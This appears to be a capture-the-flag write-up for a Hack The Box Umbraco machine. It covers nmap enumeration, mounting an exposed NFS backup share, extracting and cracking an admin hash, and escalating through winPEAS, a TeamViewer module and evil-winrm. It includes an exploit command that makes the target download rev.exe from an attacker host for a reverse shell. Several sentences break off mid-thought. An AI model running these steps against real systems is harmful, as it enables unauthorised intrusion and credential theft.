Port Scanning and general enumeration (Nmap, Umbraco)
nmap -sC -sV -oN nmap/initial -T4 10.10.10.180
Interesting. FTP, Webserver and maybe some nfs shares we can mount?
Let’s take a look at the site
Looks like some sort of blog.. ‘Umbraco’?
So we’ve found a login form. Nice. Default creds didn’t work, so we’ll come back to this.
Let’s see if there’s anything to mount
Interesting! Let’s mount it
sudo mount -t nfs 10.10.10.180:/site_backups /path/to/where/you/want/to/save/it
Full site backup!
Since we know the backend is Umbraco, we can find the version in the
Web.config file and credentials in the
To get the credentials we can run
strings on the
Umbraco.sdf file, redirect it to a file and run
head on that file
So the admin password is a
SHA1 hash. Let’s crack it and log in using
Admin@htb.local:cracked-password in the forms we found earlier.
Access (Umbraco RCE, msfvenom)
So now that we’re authenticated we have a little more room to play with things. I found this Umbraco RCE script that should be perfect
Nice! So now we have remote code execution. Let’s get a proper shell
Stand up a simple python http server and use the exploit to transfer our executable to the machine
python3 exploit.py -u email@example.com -p password -i 'http://10.10.10.180' -c powershell.exe -a '-NoProfile -Command Invoke-WebRequest -Uri http://10.10.14.22:8000/rev.exe -OutFile C:/Users/Public/rev.exe
Now that our shell is on the box, let’s fire up a
Trigger the shell and off we go
Privesc (winPEAS, evil-winrm)
Now that we’re on the box, let’s do some enumeration. I like winPEAS
Upload and run it
Interesting. Teamviewer7 also has a metasploit module. Let’s see what that has for us
Background your meterpreter session and
Could that be the Admin password? Let’s check using evil-winrm